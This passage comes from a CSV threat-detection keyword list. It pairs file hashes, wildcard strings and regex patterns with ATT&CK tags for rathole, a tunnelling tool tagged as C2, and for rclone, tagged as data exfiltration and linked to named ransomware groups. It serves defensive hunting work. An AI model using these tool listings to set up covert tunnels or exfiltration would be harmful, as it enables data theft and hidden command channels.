TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*c80c697470033dcb0c21c4c8bfb51f8514b4bfc10f3cc64e0960ed62420eb14f*",".{0,1000}c80c697470033dcb0c21c4c8bfb51f8514b4bfc10f3cc64e0960ed62420eb14f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*c8ca4efbee070fbf92d8029eb0ab7b6debc91c4f7fc3fe6c578c416294807565*",".{0,1000}c8ca4efbee070fbf92d8029eb0ab7b6debc91c4f7fc3fe6c578c416294807565.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*c9404d48d63246380ae88630c327b603c5795542b4cc51287bea22a04bca46b5*",".{0,1000}c9404d48d63246380ae88630c327b603c5795542b4cc51287bea22a04bca46b5.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*c9673c278cbf55574c7a8d0c4e067e2d39b938d673b0d7332f58d28170ce267b*",".{0,1000}c9673c278cbf55574c7a8d0c4e067e2d39b938d673b0d7332f58d28170ce267b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*ca6c79f236c29b8a923703800c1bc63ed8eb9d4e7f1951e9660bfdcc2b98e55e*",".{0,1000}ca6c79f236c29b8a923703800c1bc63ed8eb9d4e7f1951e9660bfdcc2b98e55e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*cabd08e92a016eb971ebda7ee0954f8e2b9cc234a3a61e4c04ce6fa97798ff06*",".{0,1000}cabd08e92a016eb971ebda7ee0954f8e2b9cc234a3a61e4c04ce6fa97798ff06.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*cb548fc5c8a0eccd0a51a371d5ceb8abf994ea20a570d97cbd4592db6ac1919b*",".{0,1000}cb548fc5c8a0eccd0a51a371d5ceb8abf994ea20a570d97cbd4592db6ac1919b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*ccfae00ec39b5da0ecd9b68049725f07ac4a340c837fd43468419a5a5929f103*",".{0,1000}ccfae00ec39b5da0ecd9b68049725f07ac4a340c837fd43468419a5a5929f103.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*ce30c574477d0b2527ccfe103b31d810f6c1aa8a83c08bfb5899214951d75c0d*",".{0,1000}ce30c574477d0b2527ccfe103b31d810f6c1aa8a83c08bfb5899214951d75c0d.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*ce9c03462b055ad6152b572662fbbc1febb19f9ce41f6ff7c7a2bfed51102166*",".{0,1000}ce9c03462b055ad6152b572662fbbc1febb19f9ce41f6ff7c7a2bfed51102166.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*d00b56fb9a39f27ad1c1b95a397861ab2d9898e13f60046669c72b875dcd43f4*",".{0,1000}d00b56fb9a39f27ad1c1b95a397861ab2d9898e13f60046669c72b875dcd43f4.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*d258f53b9e011e64920fb4f74c2cf0386993b9427de52c71b2147676422da83e*",".{0,1000}d258f53b9e011e64920fb4f74c2cf0386993b9427de52c71b2147676422da83e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*d5f0bd19109ae3e6385b613848cc09bee2d9b9a853c56ee82b75c888a2369499*",".{0,1000}d5f0bd19109ae3e6385b613848cc09bee2d9b9a853c56ee82b75c888a2369499.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*dcb2717dd9c64e62a47b08565d50d43f8be857b9febd6f3a150941f95ce7ba44*",".{0,1000}dcb2717dd9c64e62a47b08565d50d43f8be857b9febd6f3a150941f95ce7ba44.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*dd4a876937f29c0732fe28b12d83372eab31a776a0a5c59f774190163bc6d442*",".{0,1000}dd4a876937f29c0732fe28b12d83372eab31a776a0a5c59f774190163bc6d442.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*dda6b391a168711d19c4499aba12c914e222dd053def0c21d054d66c53226bcc*",".{0,1000}dda6b391a168711d19c4499aba12c914e222dd053def0c21d054d66c53226bcc.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*e11c8f5673861b72e624373d2ebfed1cc50ebd59c8633da4b87a1e2361a53c02*",".{0,1000}e11c8f5673861b72e624373d2ebfed1cc50ebd59c8633da4b87a1e2361a53c02.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*e16e725b1a703f35d47a43e9c74996017703a65bcfd2fe042af15185ac856e29*",".{0,1000}e16e725b1a703f35d47a43e9c74996017703a65bcfd2fe042af15185ac856e29.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*e415807ec90293945012e78bfc528d3585e7672ca050cd3b56084e112c2d0249*",".{0,1000}e415807ec90293945012e78bfc528d3585e7672ca050cd3b56084e112c2d0249.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*e51c2e66cc4407d842afa1c1f700549da5efd37a6bd2dcc5c8094b777c72bc76*",".{0,1000}e51c2e66cc4407d842afa1c1f700549da5efd37a6bd2dcc5c8094b777c72bc76.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*e54a93d0138fae68b4876b8f9ba5f88d2ce5b0d238a7fca6925ad6d0aeac5d98*",".{0,1000}e54a93d0138fae68b4876b8f9ba5f88d2ce5b0d238a7fca6925ad6d0aeac5d98.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*e66e1d2a59507e235e6302d1a00e7bb3df833ba25b7151ef2d7521dbc1c2e3f3*",".{0,1000}e66e1d2a59507e235e6302d1a00e7bb3df833ba25b7151ef2d7521dbc1c2e3f3.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*e674a3b1a74f65ff587eef1080d3ce789484615f66af8c9c332231e9304f5220*",".{0,1000}e674a3b1a74f65ff587eef1080d3ce789484615f66af8c9c332231e9304f5220.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*e6a85ade86d4ae629e14eecf8883a618a8ddfd4c02bedc77cbb1a9e3219a56f0*",".{0,1000}e6a85ade86d4ae629e14eecf8883a618a8ddfd4c02bedc77cbb1a9e3219a56f0.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*e8662d80d2cc9acc5f8f4d8a1c1a5ff7717b2fa71919a405d0eed8b64c8c1d88*",".{0,1000}e8662d80d2cc9acc5f8f4d8a1c1a5ff7717b2fa71919a405d0eed8b64c8c1d88.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*eb23b507e63729581b16b35de2db0cad23cce0afc1de1018198066c20e5c0c20*",".{0,1000}eb23b507e63729581b16b35de2db0cad23cce0afc1de1018198066c20e5c0c20.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*ec79b650c290fdfc46a1c80359337ba7458eee334197d2aecac4a3b86db1a1ed*",".{0,1000}ec79b650c290fdfc46a1c80359337ba7458eee334197d2aecac4a3b86db1a1ed.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*ece4f9a9ae3d7823ed86c3dcc5540b02c7504904bbe0878d17cd7bbf71ac61ee*",".{0,1000}ece4f9a9ae3d7823ed86c3dcc5540b02c7504904bbe0878d17cd7bbf71ac61ee.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*ee5d276260040e43272cdf7c70c51e4a03a959e0bd4f3f4752edb02569c7736a*",".{0,1000}ee5d276260040e43272cdf7c70c51e4a03a959e0bd4f3f4752edb02569c7736a.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*f052586d3c8b6cecbafff4773c2a67a130c00ecdece4ea43f101923c53c28f58*",".{0,1000}f052586d3c8b6cecbafff4773c2a67a130c00ecdece4ea43f101923c53c28f58.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*f160f0e2319e8ead547548ccecdff561aea5b77a3bb00b387e1ddf3f1c3298db*",".{0,1000}f160f0e2319e8ead547548ccecdff561aea5b77a3bb00b387e1ddf3f1c3298db.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*f1c1f6e3dd1697be115ea8567fbed5f993832bc5e2400e69dbac6ccd95d02c61*",".{0,1000}f1c1f6e3dd1697be115ea8567fbed5f993832bc5e2400e69dbac6ccd95d02c61.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*f36b371ac6f48895384d78dc53d83daaf59d6f7086d5cb9ce7c74ba60ab81a0b*",".{0,1000}f36b371ac6f48895384d78dc53d83daaf59d6f7086d5cb9ce7c74ba60ab81a0b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*f415f14b5c1f88971cfd80555ba1a0c77a437401a7bd623a616261b7985ac5c2*",".{0,1000}f415f14b5c1f88971cfd80555ba1a0c77a437401a7bd623a616261b7985ac5c2.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*f43398d585caae28761b340c083216b2dda0898667161c5a43f587cea8b7f799*",".{0,1000}f43398d585caae28761b340c083216b2dda0898667161c5a43f587cea8b7f799.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*f4a0d07aa0dd0cb020a0d3273a615107ddb15ca8264577ac4c22e41cad47a2c2*",".{0,1000}f4a0d07aa0dd0cb020a0d3273a615107ddb15ca8264577ac4c22e41cad47a2c2.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*f57034e42cba38366cfc0a304f16b1c1412419e322560d589d6b896312acde7f*",".{0,1000}f57034e42cba38366cfc0a304f16b1c1412419e322560d589d6b896312acde7f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*f889e16f7550565628be5da507bbf33ab1fca61ab3541015fbb7a120a3a9cc29*",".{0,1000}f889e16f7550565628be5da507bbf33ab1fca61ab3541015fbb7a120a3a9cc29.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*f9b0e8b9bdc130652b4ec4c86a9c2d03dc85bd2057401970ff34cb5284581b90*",".{0,1000}f9b0e8b9bdc130652b4ec4c86a9c2d03dc85bd2057401970ff34cb5284581b90.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*fa4a6fc63d86f8f1faa7c103a845e4715ce79a048455c0eec897b27237576564*",".{0,1000}fa4a6fc63d86f8f1faa7c103a845e4715ce79a048455c0eec897b27237576564.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*Failed to run the pingpong server for testing: *",".{0,1000}Failed\sto\srun\sthe\spingpong\sserver\sfor\stesting\:\s.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*fb75480462e81fe6c0d821641057d0534989a45452feb66851bf781e42e82ef5*",".{0,1000}fb75480462e81fe6c0d821641057d0534989a45452feb66851bf781e42e82ef5.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*fc3b41639946509efb1f6835bc2da2233482f71859031aeb73006967ef5d7b66*",".{0,1000}fc3b41639946509efb1f6835bc2da2233482f71859031aeb73006967ef5d7b66.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*fc6b0a57727383a1491591f8e9ee76b1e0e25ecf7c2736b803d8f4411f651a15*",".{0,1000}fc6b0a57727383a1491591f8e9ee76b1e0e25ecf7c2736b803d8f4411f651a15.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*fd243d10718135287eb1a555427abf58fdf9cabad14d08d31815763479b877dd*",".{0,1000}fd243d10718135287eb1a555427abf58fdf9cabad14d08d31815763479b877dd.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*fe24df06821a78f1ccc81a8459ed13a14558b632908b266864257636e4fa8812*",".{0,1000}fe24df06821a78f1ccc81a8459ed13a14558b632908b266864257636e4fa8812.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*fee22f170cba77a8a17614c87621393e45ca2d703c049ca5e352083f0c9dd313*",".{0,1000}fee22f170cba77a8a17614c87621393e45ca2d703c049ca5e352083f0c9dd313.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*fef39ed9d25e944711e2a27d5a9c812163ab184bf3f703827fca6bbf54504fbf*",".{0,1000}fef39ed9d25e944711e2a27d5a9c812163ab184bf3f703827fca6bbf54504fbf.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*rapiz1/rathole*",".{0,1000}rapiz1\/rathole.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","1","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*rathole config.toml*",".{0,1000}rathole\sconfig\.toml.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*rathole server.toml*",".{0,1000}rathole\sserver\.toml.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*ratholec-mem.log*",".{0,1000}ratholec\-mem\.log.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*ratholes-mem.log*",".{0,1000}ratholes\-mem\.log.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*.configrclonerclone.conf*",".{0,1000}\.configrclonerclone\.conf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*.rclone.exe config*",".{0,1000}\.rclone\.exe\sconfig.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*/rclone.conf*",".{0,1000}\/rclone\.conf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - 
Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*/rclone.exe*",".{0,1000}\/rclone\.exe.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","interactive mode","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*/rclone.git*",".{0,1000}\/rclone\.git.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","1","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*/rclone.rar*",".{0,1000}\/rclone\.rar.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker 
